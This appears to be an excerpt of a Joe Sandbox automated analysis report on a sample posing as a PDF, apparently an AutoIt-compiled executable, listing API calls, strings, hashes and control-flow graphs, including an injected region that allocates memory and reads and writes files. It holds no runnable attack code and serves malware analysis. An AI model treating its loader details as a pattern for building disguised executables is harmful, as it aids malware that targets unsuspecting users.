                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                    • API String ID: 2641332412-570651680
                                                    • Opcode ID: 7af87ef4a02a9183dff7b5da4a974387516003a83e87206b4df6d77789e2f5f3
                                                    • Instruction ID: beb1ec2c9451e47394b9d442a189793fba7a4734bbac49387f4290ca8c2b38c8
                                                    • Opcode Fuzzy Hash: 7af87ef4a02a9183dff7b5da4a974387516003a83e87206b4df6d77789e2f5f3
                                                    • Instruction Fuzzy Hash: 8D62B070508340DFDB26DF24C885BAA77E8BF45304F04497DFA869F6A2DB75A848CB52
                                                    APIs
                                                    • ___createFile.LIBCMT ref: 00375EC3
                                                    • ___createFile.LIBCMT ref: 00375F04
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F2D
                                                    • __dosmaperr.LIBCMT ref: 00375F34
                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F47
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F6A
                                                    • __dosmaperr.LIBCMT ref: 00375F73
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F7C
                                                    • __set_osfhnd.LIBCMT ref: 00375FAC
                                                    • __lseeki64_nolock.LIBCMT ref: 00376016
                                                    • __close_nolock.LIBCMT ref: 0037603C
                                                    • __chsize_nolock.LIBCMT ref: 0037606C
                                                    • __lseeki64_nolock.LIBCMT ref: 0037607E
                                                    • __lseeki64_nolock.LIBCMT ref: 00376176
                                                    • __lseeki64_nolock.LIBCMT ref: 0037618B
                                                    • __close_nolock.LIBCMT ref: 003761EB
                                                      • Part of subcall function 0036EA9C: CloseHandle.KERNELBASE(00000000,003EEEF4,00000000,?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAEC
                                                      • Part of subcall function 0036EA9C: GetLastError.KERNEL32(?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAF6
                                                      • Part of subcall function 0036EA9C: __free_osfhnd.LIBCMT ref: 0036EB03
                                                      • Part of subcall function 0036EA9C: __dosmaperr.LIBCMT ref: 0036EB25
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __lseeki64_nolock.LIBCMT ref: 0037620D
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00376342
                                                    • ___createFile.LIBCMT ref: 00376361
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037636E
                                                    • __dosmaperr.LIBCMT ref: 00376375
                                                    • __free_osfhnd.LIBCMT ref: 00376395
                                                    • __invoke_watson.LIBCMT ref: 003763C3
                                                    • __wsopen_helper.LIBCMT ref: 003763DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                    • String ID: @
                                                    • API String ID: 3896587723-2766056989
                                                    • Opcode ID: 3b92727374424b3b8986f0c008f4357861f3ffcbd89b114392e158f8694133b4
                                                    • Instruction ID: 83fb7e285a1d91a72dae130cf0d9d13f7ebb1b6d9a090252230ef11ab5754a0c
                                                    • Opcode Fuzzy Hash: 3b92727374424b3b8986f0c008f4357861f3ffcbd89b114392e158f8694133b4
                                                    • Instruction Fuzzy Hash: 6D224771904A059FEB3B9F68CC56BBD7B61EB14314F25C228E519AB2D2C37D8D40CB91

                                                    Control-flow Graph

                                                    APIs
                                                    • _wcscpy.LIBCMT ref: 0038FA96
                                                    • _wcschr.LIBCMT ref: 0038FAA4
                                                    • _wcscpy.LIBCMT ref: 0038FABB
                                                    • _wcscat.LIBCMT ref: 0038FACA
                                                    • _wcscat.LIBCMT ref: 0038FAE8
                                                    • _wcscpy.LIBCMT ref: 0038FB09
                                                    • __wsplitpath.LIBCMT ref: 0038FBE6
                                                    • _wcscpy.LIBCMT ref: 0038FC0B
                                                    • _wcscpy.LIBCMT ref: 0038FC1D
                                                    • _wcscpy.LIBCMT ref: 0038FC32
                                                    • _wcscat.LIBCMT ref: 0038FC47
                                                    • _wcscat.LIBCMT ref: 0038FC59
                                                    • _wcscat.LIBCMT ref: 0038FC6E
                                                      • Part of subcall function 0038BFA4: _wcscmp.LIBCMT ref: 0038C03E
                                                      • Part of subcall function 0038BFA4: __wsplitpath.LIBCMT ref: 0038C083
                                                      • Part of subcall function 0038BFA4: _wcscpy.LIBCMT ref: 0038C096
                                                      • Part of subcall function 0038BFA4: _wcscat.LIBCMT ref: 0038C0A9
                                                      • Part of subcall function 0038BFA4: __wsplitpath.LIBCMT ref: 0038C0CE
                                                      • Part of subcall function 0038BFA4: _wcscat.LIBCMT ref: 0038C0E4
                                                      • Part of subcall function 0038BFA4: _wcscat.LIBCMT ref: 0038C0F7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                    • String ID: >>>AUTOIT SCRIPT<<<$t2?
                                                    • API String ID: 2955681530-974027732
                                                    • Opcode ID: b0a86bd436ace2bc6b193fb894fd900bbb0b5345dcd9614b4419115b80f4537f
                                                    • Instruction ID: 55d67776def699c0a22383e2e804d5353591e9c44dd1a5b80547727af75c62b7
                                                    • Opcode Fuzzy Hash: b0a86bd436ace2bc6b193fb894fd900bbb0b5345dcd9614b4419115b80f4537f
                                                    • Instruction Fuzzy Hash: 0C918F71504705AFCB26EB54C851F9BB3E8BF84310F048969F9599F2A1DB30FA48CB92

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                                    • RegisterClassExW.USER32(00000030), ref: 00343FB0
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                                    • LoadIconW.USER32(000000A9), ref: 00344004
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                                    • Instruction ID: 0deda29dace51c6f5087e468232a98cac97113b7fdadd831e53ab1414084c8b4
                                                    • Opcode Fuzzy Hash: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                                    • Instruction Fuzzy Hash: 1821C3B5D00218AFDB01DFA4ED89BCDBBB8FB08704F00462AFA15F62A0D7B555448F95

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0038BDB4: __time64.LIBCMT ref: 0038BDBE
                                                      • Part of subcall function 00344517: _fseek.LIBCMT ref: 0034452F
                                                    • __wsplitpath.LIBCMT ref: 0038C083
                                                      • Part of subcall function 00361DFC: __wsplitpath_helper.LIBCMT ref: 00361E3C
                                                    • _wcscpy.LIBCMT ref: 0038C096
                                                    • _wcscat.LIBCMT ref: 0038C0A9
                                                    • __wsplitpath.LIBCMT ref: 0038C0CE
                                                    • _wcscat.LIBCMT ref: 0038C0E4
                                                    • _wcscat.LIBCMT ref: 0038C0F7
                                                    • _wcscmp.LIBCMT ref: 0038C03E
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C65D
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C670
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C2A1
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C338
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C34E
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C35F
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C371
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                    • String ID:
                                                    • API String ID: 2378138488-0
                                                    • Opcode ID: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                                    • Instruction ID: d475434a2d69d191c6974367186c10fbd553942a8890b3995645e6773e26bd41
                                                    • Opcode Fuzzy Hash: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                                    • Instruction Fuzzy Hash: CAC10AB1910219AFDF12EF95CC85EDEB7BDAF49310F1080A6F609EA151DB70AA448F61

                                                    Control-flow Graph

                                                    control_flow_graph 957 343742-343762 959 343764-343767 957->959 960 3437c2-3437c4 957->960 961 3437c8 959->961 962 343769-343770 959->962 960->959 963 3437c6 960->963 965 3437ce-3437d1 961->965 966 3b1e00-3b1e2e call 342ff6 call 35e312 961->966 967 343776-34377b 962->967 968 34382c-343834 PostQuitMessage 962->968 964 3437ab-3437b3 DefWindowProcW 963->964 975 3437b9-3437bf 964->975 969 3437f6-34381d SetTimer RegisterWindowMessageW 965->969 970 3437d3-3437d4 965->970 1004 3b1e33-3b1e3a 966->1004 972 3b1e88-3b1e9c call 384ddd 967->972 973 343781-343783 967->973 974 3437f2-3437f4 968->974 969->974 979 34381f-34382a CreatePopupMenu 969->979 976 3b1da3-3b1da6 970->976 977 3437da-3437ed KillTimer call 343847 call 34390f 970->977 972->974 998 3b1ea2 972->998 980 343836-343840 call 35eb83 973->980 981 343789-34378e 973->981 974->975 989 3b1da8-3b1daa 976->989 990 3b1ddc-3b1dfb MoveWindow 976->990 977->974 979->974 999 343845 980->999 985 343794-343799 981->985 986 3b1e6d-3b1e74 981->986 996 3b1e58-3b1e68 call 3855bd 985->996 997 34379f-3437a5 985->997 986->964 994 3b1e7a-3b1e83 call 37a5f3 986->994 991 3b1dcb-3b1dd7 SetFocus 989->991 992 3b1dac-3b1daf 989->992 990->974 991->974 992->997 1000 3b1db5-3b1dc6 call 342ff6 992->1000 994->964 996->974 997->964 997->1004 998->964 999->974 1000->974 1004->964 1008 3b1e40-3b1e53 call 343847 call 344ffc 1004->1008 1008->964
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 003437B3
                                                    • KillTimer.USER32(?,00000001), ref: 003437DD
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00343800
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034380B
                                                    • CreatePopupMenu.USER32 ref: 0034381F
                                                    • PostQuitMessage.USER32(00000000), ref: 0034382E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: 88f77f77c42c998587deb3fe11b781cac6e5931c974150bee98667b975fa7fb5
                                                    • Instruction ID: b785c39d9c0028f5c44d7fda5d52794be18fab22e2ff98e0e055402a8036320e
                                                    • Opcode Fuzzy Hash: 88f77f77c42c998587deb3fe11b781cac6e5931c974150bee98667b975fa7fb5
                                                    • Instruction Fuzzy Hash: A74128F1104245A7DB176B689D4AFBA3AD9F704300F400135FA82EF9E1CB75BE509766

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                                    • LoadIconW.USER32(00000063), ref: 00343E9E
                                                    • LoadIconW.USER32(000000A4), ref: 00343EB0
                                                    • LoadIconW.USER32(000000A2), ref: 00343EC2
                                                      • Part of subcall function 00344024: LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                                    • RegisterClassExW.USER32(?), ref: 00343F30
                                                      • Part of subcall function 00343F53: GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                                      • Part of subcall function 00343F53: RegisterClassExW.USER32(00000030), ref: 00343FB0
                                                      • Part of subcall function 00343F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                                      • Part of subcall function 00343F53: InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                                      • Part of subcall function 00343F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                                      • Part of subcall function 00343F53: LoadIconW.USER32(000000A9), ref: 00344004
                                                      • Part of subcall function 00343F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                                    • Instruction ID: 2f27ed00f3e4d5891fdca08c945ff3753f6e8bedd5911421caa425f091fe50ba
                                                    • Opcode Fuzzy Hash: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                                    • Instruction Fuzzy Hash: E92130B0D00304ABCB05DFA9ED49A99BFF9FB48310F00813AE618BB2B1D77556448F95

                                                    Control-flow Graph

                                                    control_flow_graph 1076 ceba88-cebada call ceb988 CreateFileW 1079 cebadc-cebade 1076->1079 1080 cebae3-cebaf0 1076->1080 1081 cebc3c-cebc40 1079->1081 1083 cebaf2-cebafe 1080->1083 1084 cebb03-cebb1a VirtualAlloc 1080->1084 1083->1081 1085 cebb1c-cebb1e 1084->1085 1086 cebb23-cebb49 CreateFileW 1084->1086 1085->1081 1088 cebb6d-cebb87 ReadFile 1086->1088 1089 cebb4b-cebb68 1086->1089 1090 cebbab-cebbaf 1088->1090 1091 cebb89-cebba6 1088->1091 1089->1081 1092 cebbd0-cebbe7 WriteFile 1090->1092 1093 cebbb1-cebbce 1090->1093 1091->1081 1095 cebbe9-cebc10 1092->1095 1096 cebc12-cebc37 CloseHandle VirtualFree 1092->1096 1093->1081 1095->1081 1096->1081
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00CEBACD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction ID: 9d6c785d0e73e507e9da868de77dc7eb8bc45757de2ce0a238a6323553fa391c
                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction Fuzzy Hash: 14510575A50248FBEB20DFA1CC49FEF77B8BF48700F608554F61AEA180DB749A459B60

                                                    Control-flow Graph

                                                    control_flow_graph 1106 3449fb-344a25 call 34bcce RegOpenKeyExW 1109 3b41cc-3b41e3 RegQueryValueExW 1106->1109 1110 344a2b-344a2f 1106->1110 1111 3b4246-3b424f RegCloseKey 1109->1111 1112 3b41e5-3b4222 call 35f4ea call 3447b7 RegQueryValueExW 1109->1112 1117 3b423d-3b4245 call 3447e2 1112->1117 1118 3b4224-3b423b call 346a63 1112->1118 1117->1111 1118->1117
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00344A1D
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003B41DB
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003B421A
                                                    • RegCloseKey.ADVAPI32(?), ref: 003B4249
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                                    • Instruction ID: 83aecc328673749cf21872a1dcdedc84091510207cd45b0767f8a64b1e0595bd
                                                    • Opcode Fuzzy Hash: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                                    • Instruction Fuzzy Hash: 30113071600118BEDB06ABA8DD86DEF7BBCEF04344F104465F506DB1A1EA70AE029750

                                                    Control-flow Graph

                                                    control_flow_graph 1133 3436b8-343728 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                                    • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                                    • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                                    • Instruction ID: 4469ade2387670fb44cd185170a343d3c8fc81b2b1fa9add48383e17fba4a829
                                                    • Opcode Fuzzy Hash: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                                    • Instruction Fuzzy Hash: 29F03A755402D07AE7325B57AD88E673EBDD7C6F20F01802FBA04A22B0C5711891CAB4

                                                    APIs
                                                      • Part of subcall function 00345374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401148,?,003461FF,?,00000000,00000001,00000000), ref: 00345392
                                                      • Part of subcall function 003449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00344A1D
                                                    • _wcscat.LIBCMT ref: 003B2D80
                                                    • _wcscat.LIBCMT ref: 003B2DB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileModuleNameOpen
                                                    • String ID: 8!@$\$\Include\
                                                    • API String ID: 3592542968-3569967281
                                                    • Opcode ID: 0e0236962267ec3f1924fca600e3910efc139a7a5e11f2a4f3dc3487bc97844c
                                                    • Instruction ID: 97039120fc25f0bc19bead32d4d8fd09755ba185df4e11ee3b4a603f361af9d6
                                                    • Opcode Fuzzy Hash: 0e0236962267ec3f1924fca600e3910efc139a7a5e11f2a4f3dc3487bc97844c
                                                    • Instruction Fuzzy Hash: F85182754143408BC706EF55EB8699BB7F8FF49300B40453EF684AF2A1DBB09608CB5A

                                                    Control-flow Graph

                                                    control_flow_graph 1291 344139-344160 call 3441a9 1294 3b3489-3b3499 call 38c396 1291->1294 1295 344166-344174 call 3441a9 1291->1295 1299 3b349e-3b34a0 1294->1299 1295->1294 1300 34417a-344180 1295->1300 1301 3b34bf-3b3507 call 35f4ea 1299->1301 1302 3b34a2-3b34a5 call 344252 1299->1302 1304 3b34aa-3b34b9 call 386b49 1300->1304 1305 344186-3441a6 call 34c833 1300->1305 1311 3b3509-3b3526 call 34496c 1301->1311 1312 3b3528 1301->1312 1302->1304 1304->1301 1315 3b352a-3b353d 1311->1315 1312->1315 1317 3b3543 1315->1317 1318 3b36b4-3b36b7 call 361c9d 1315->1318 1320 3b354a-3b354d call 344f30 1317->1320 1321 3b36bc-3b36c5 call 344252 1318->1321 1324 3b3552-3b3574 call 34bbfc call 389cab 1320->1324 1328 3b36c7-3b36d7 call 344f11 call 35d8f5 1321->1328 1333 3b3588-3b3592 call 389c95 1324->1333 1334 3b3576-3b3583 1324->1334 1341 3b36dc-3b370c call 3825b5 call 35f55e call 361c9d call 344252 1328->1341 1343 3b35ac-3b35b6 call 389c7f 1333->1343 1344 3b3594-3b35a7 1333->1344 1337 3b367b-3b368b call 34ba85 1334->1337 1337->1324 1346 3b3691-3b369b call 344dd9 1337->1346 1341->1328 1353 3b35ca-3b35d4 call 35d90c 1343->1353 1354 3b35b8-3b35c5 1343->1354 1344->1337 1352 3b36a0-3b36ae 1346->1352 1352->1318 1352->1320 1353->1337 1359 3b35da-3b35f2 call 382551 1353->1359 1354->1337 1365 3b3615-3b3618 1359->1365 1366 3b35f4-3b3613 call 34ce19 call 34cb37 1359->1366 1368 3b361a-3b3635 call 34ce19 call 35c2a5 call 34cb37 1365->1368 1369 3b3646-3b3649 1365->1369 1390 3b3636-3b3644 call 34bbfc 1366->1390 1368->1390 1371 3b364b-3b3654 call 382472 1369->1371 1372 3b3669-3b366c call 389c12 1369->1372 1371->1341 1382 3b365a-3b3664 call 35f55e 1371->1382 1379 3b3671-3b367a call 35f55e 1372->1379 1379->1337 1382->1324 1390->1379
                                                    APIs
                                                      • Part of subcall function 003441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003439FE,?,00000001), ref: 003441DB
                                                    • _free.LIBCMT ref: 003B36B7
                                                    • _free.LIBCMT ref: 003B36FE
                                                      • Part of subcall function 0034C833: __wsplitpath.LIBCMT ref: 0034C93E
                                                      • Part of subcall function 0034C833: _wcscpy.LIBCMT ref: 0034C953
